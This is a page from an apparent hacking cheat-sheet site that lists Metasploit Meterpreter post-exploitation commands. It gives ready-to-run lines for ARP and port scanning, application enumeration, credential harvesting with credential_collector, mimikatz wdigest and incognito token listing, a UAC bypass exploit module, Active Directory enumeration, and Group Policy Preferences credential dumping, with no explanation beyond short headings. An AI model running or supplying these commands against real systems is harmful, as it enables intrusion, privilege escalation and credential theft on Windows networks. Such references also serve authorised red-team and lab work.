๐บ
๐บ
๐บ
๐บ
CheatSheets
Searchโฆ
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By
GitBook
Metasploit
Meterpreter
Arp Scan
1
run arp_scanner -r <iP>/24
Copied!
Nmap
1
db_nmap -sS -A <IP>
Copied!
PortScan
1
run auxiliary/scanner/portscan/tcp
Copied!
Application Info
1
run post/windows/gather/enum_applications
Copied!
Credential Gathering
1
run post/windows/gather/credentials/credential_collector
2
โ
3
load mimikatz
4
wdigest
5
โ
6
load incognito
7
list_tokens -u
Copied!
Windows
1
# Collect a load of info
2
run winenum
3
โ
4
# Show privs
5
run post/windows/gather/win_privs
6
โ
7
# Run as
8
use exploit/windows/local/run_as
9
โ
10
# Bypass UAC
11
use exploit/windows/local/bypassuac_injection
Copied!
AD
1
# Enumeration ADSI
2
load extapi
3
help extapi
4
โ
5
adsi_computer_enum domainname
6
โ
7
# GPP
8
use post/windows/gather/credentials/gpp
Copied!
Red Teaming - Previous
Cobalt Strike
Next - Linux
Networking
Last modified
1yr ago
Copy link
Contents
Meterpreter
Arp Scan
Nmap
PortScan
Application Info
Credential Gathering
Windows
AD